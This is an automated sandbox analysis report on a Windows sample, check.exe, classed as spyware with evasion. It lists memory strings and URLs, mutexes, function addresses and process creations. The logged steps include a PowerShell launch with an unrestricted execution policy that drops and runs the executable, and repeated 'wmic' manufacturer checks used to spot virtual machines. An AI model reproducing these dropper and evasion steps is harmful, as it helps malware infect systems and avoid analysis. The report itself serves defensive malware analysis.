Source: check.exe, 00000005.00000002.2737284106.0000029FD96C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
Source: check.exe, 00000005.00000002.2736379235.0000029FD9080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: check.exe, 00000005.00000003.2283651155.0000029FD9955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/url
Source: check.exe, 00000005.00000002.2738181811.0000029FD9BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283352961.0000029FD986E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: check.exe, 00000005.00000002.2738633963.0000029FD9E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: check.exe, 00000005.00000002.2738633963.0000029FD9E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920p
Source: check.exe, 00000005.00000002.2738633963.0000029FD9E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: check.exe, 00000005.00000002.2738633963.0000029FD9E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/32902
Source: powershell.exe, 00000000.00000002.2198164900.0000022B12500000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2319400919.0000029FD9955000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9955000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283651155.0000029FD9955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
Source: check.exe, 00000005.00000003.2283352961.0000029FD97FB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2319400919.0000029FD9955000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9955000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283651155.0000029FD9955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
Source: check.exe, 00000005.00000003.2283352961.0000029FD986E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
Source: check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A01000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
Source: check.exe, 00000005.00000002.2739097916.0000029FDA060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
Source: check.exe, 00000005.00000002.2736668202.0000029FD93C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
Source: check.exe, 00000005.00000003.2314207522.0000029FD959B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
Source: check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282239891.0000029FD9AB0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A01000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283651155.0000029FD9A60000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A60000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2312815285.0000029FD9A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
Source: check.exe, 00000005.00000002.2740761730.0000029FDA9D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist/v22.11.0/node-v22.11.0-win-x64.zip
Source: check.exe, 00000005.00000002.2738633963.0000029FD9E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
Source: check.exe, 00000005.00000002.2737420337.0000029FD9896000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283352961.0000029FD9896000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
Source: check.exe, 00000005.00000002.2737420337.0000029FD9896000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283352961.0000029FD9896000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
Source: check.exe, 00000005.00000002.2738402783.0000029FD9D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: check.exe, 00000005.00000002.2737126213.0000029FD95C0000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000003.2277497052.0000029FD949C000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2265685070.0000029FD9081000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
Source: check.exe, 00000005.00000002.2758624413.00007FF89FF78000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
Source: check.exe, 00000005.00000002.2739097916.0000029FDA0E4000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2736668202.0000029FD93C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
Source: check.exe, 00000005.00000002.2739551780.0000029FDA1E8000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2740761730.0000029FDA960000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/4457745#4457745.
Source: check.exe, 00000005.00000002.2736668202.0000029FD947E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: check.exe, 00000005.00000003.2279631020.0000029FD986E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2279030920.0000029FD98B8000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD98B2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283352961.0000029FD986E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2280765304.0000029FD986E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2280765304.0000029FD98B8000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2279030920.0000029FD98A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: check.exe, 00000005.00000003.2283352961.0000029FD97FB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
Source: check.exe, 00000005.00000002.2738402783.0000029FD9D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: check.exe, 00000005.00000002.2738402783.0000029FD9D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: check.exe, 00000004.00000003.2224356100.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2197903575.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208243247.000001C184430000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2224674718.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2225043556.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2198901562.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2202718129.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223559467.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222374412.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222581886.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2226406918.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2196346858.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223857971.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2208719982.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2200573092.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2223763846.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2203572756.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2201279267.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2222127490.000001C184424000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2227016406.000001C184425000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: check.exe, 00000004.00000003.2259344289.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2750079681.00007FF89F314000.00000002.00000001.01000000.0000001A.sdmp, check.exe, 00000005.00000002.2748705247.00007FF89EE10000.00000002.00000001.01000000.0000001B.sdmpString found in binary or memory: https://www.openssl.org/H
Source: check.exe, 00000005.00000002.2736668202.0000029FD93C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
Source: check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282239891.0000029FD9AB0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A01000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283651155.0000029FD9A60000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282278745.0000029FD9A60000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2312815285.0000029FD9A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
Source: check.exe, 00000005.00000002.2758624413.00007FF89FF78000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.python.org/psf/license/)
Source: check.exe, 00000005.00000002.2736668202.0000029FD947E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
Source: check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: check.exe, 00000005.00000003.2283352961.0000029FD97FB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2319400919.0000029FD9955000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9955000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283651155.0000029FD9955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443

System Summary

barindex
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF712515C004_2_00007FF712515C00
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7125169644_2_00007FF712516964
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7124F89E04_2_00007FF7124F89E0
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7124F10004_2_00007FF7124F1000
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7125108C84_2_00007FF7125108C8
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF712501B504_2_00007FF712501B50
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF712513C104_2_00007FF712513C10
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF712502C104_2_00007FF712502C10
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7124FA4744_2_00007FF7124FA474
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7125164184_2_00007FF712516418
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7125108C84_2_00007FF7125108C8
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7124FACAD4_2_00007FF7124FACAD
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7125021644_2_00007FF712502164
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7125019444_2_00007FF712501944
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7125039A44_2_00007FF7125039A4
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF71250DA5C4_2_00007FF71250DA5C
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7124FA2DB4_2_00007FF7124FA2DB
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF712501F604_2_00007FF712501F60
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7125087944_2_00007FF712508794
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7125197284_2_00007FF712519728
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7125017404_2_00007FF712501740
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7124F98004_2_00007FF7124F9800
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7125118744_2_00007FF712511874
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7125080E44_2_00007FF7125080E4
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7125140AC4_2_00007FF7125140AC
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF71250E5704_2_00007FF71250E570
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF712505D304_2_00007FF712505D30
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF712501D544_2_00007FF712501D54
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7125035A04_2_00007FF7125035A0
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF712515E7C4_2_00007FF712515E7C
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF71250DEF04_2_00007FF71250DEF0
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF712509EA04_2_00007FF712509EA0
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF7125169645_2_00007FF712516964
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF7124FA2DB5_2_00007FF7124FA2DB
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF7124F10005_2_00007FF7124F1000
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF712501B505_2_00007FF712501B50
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF712515C005_2_00007FF712515C00
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF712513C105_2_00007FF712513C10
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF712502C105_2_00007FF712502C10
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF7124FA4745_2_00007FF7124FA474
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF7125164185_2_00007FF712516418
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF7125108C85_2_00007FF7125108C8
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF7124FACAD5_2_00007FF7124FACAD
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF7125021645_2_00007FF712502164
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF7125019445_2_00007FF712501944
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF7124F89E05_2_00007FF7124F89E0
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF7125039A45_2_00007FF7125039A4
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF89ECA19505_2_00007FF89ECA1950
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF89ECA13005_2_00007FF89ECA1300
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 14_2_00007FF89A6C435014_2_00007FF89A6C4350
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 14_2_00007FF89A6B552714_2_00007FF89A6B5527
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 14_2_00007FF89A6B2BB014_2_00007FF89A6B2BB0
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 14_2_00007FF89A6C338014_2_00007FF89A6C3380
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 14_2_00007FF89A6B666114_2_00007FF89A6B6661
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 14_2_00007FF89A6B365014_2_00007FF89A6B3650
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 14_2_00007FF89A6C245014_2_00007FF89A6C2450
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 14_2_00007FF89A6BEC5014_2_00007FF89A6BEC50
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 14_2_00007FF89A6B981014_2_00007FF89A6B9810
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 14_2_00007FF89A6B18F014_2_00007FF89A6B18F0
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 14_2_00007FF89A6C2EE414_2_00007FF89A6C2EE4
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 14_2_00007FF89BD3227014_2_00007FF89BD32270
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 14_2_00007FF89BD3195014_2_00007FF89BD31950
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 14_2_00007FF89BD3130014_2_00007FF89BD31300
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 22_2_00007FF898C1338022_2_00007FF898C13380
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 22_2_00007FF898C02BB022_2_00007FF898C02BB0
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 22_2_00007FF898C1435022_2_00007FF898C14350
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 22_2_00007FF898C0552722_2_00007FF898C05527
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 22_2_00007FF898C018F022_2_00007FF898C018F0
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 22_2_00007FF898C12EE422_2_00007FF898C12EE4
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 22_2_00007FF898C0789022_2_00007FF898C07890
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 22_2_00007FF898C09C8022_2_00007FF898C09C80
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: String function: 00007FF7124F2710 appears 96 times
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1520 -s 892
Source: unicodedata.pyd.4.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: python3.dll.6.drStatic PE information: No import functions for PE file found
Source: python3.dll.4.drStatic PE information: No import functions for PE file found
Source: Qt5Core.dll.4.drStatic PE information: Section: .qtmimed ZLIB complexity 0.997458770800317
Source: Qt5Core.dll.6.drStatic PE information: Section: .qtmimed ZLIB complexity 0.997458770800317
Source: classification engineClassification label: mal68.spyw.evad.winPS1@30/433@1/1
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 5_2_00007FF89D94FE60 ?loadResource@QTextDocument@@MEAA?AVQVariant@@HAEBVQUrl@@@Z,??0QVariant@@QEAA@$$QEAV0@@Z,??0QVariant@@QEAA@$$QEAV0@@Z,??1QVariant@@QEAA@XZ,5_2_00007FF89D94FE60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\wimnVRrV.zipJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5244:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5688:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3608
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5300
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6256:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1520
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zazl3rte.vp1.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: check.exeString found in binary or memory: <!--StartFragment-->
Source: check.exeString found in binary or memory: <!--StartFragment-->
Source: check.exeString found in binary or memory: <!--StartFragment-->
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1520 -s 892
Source: unknownProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3608 -s 968
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe"
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5300 -s 932
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"Jump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeProcess created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe "C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturerJump to behavior
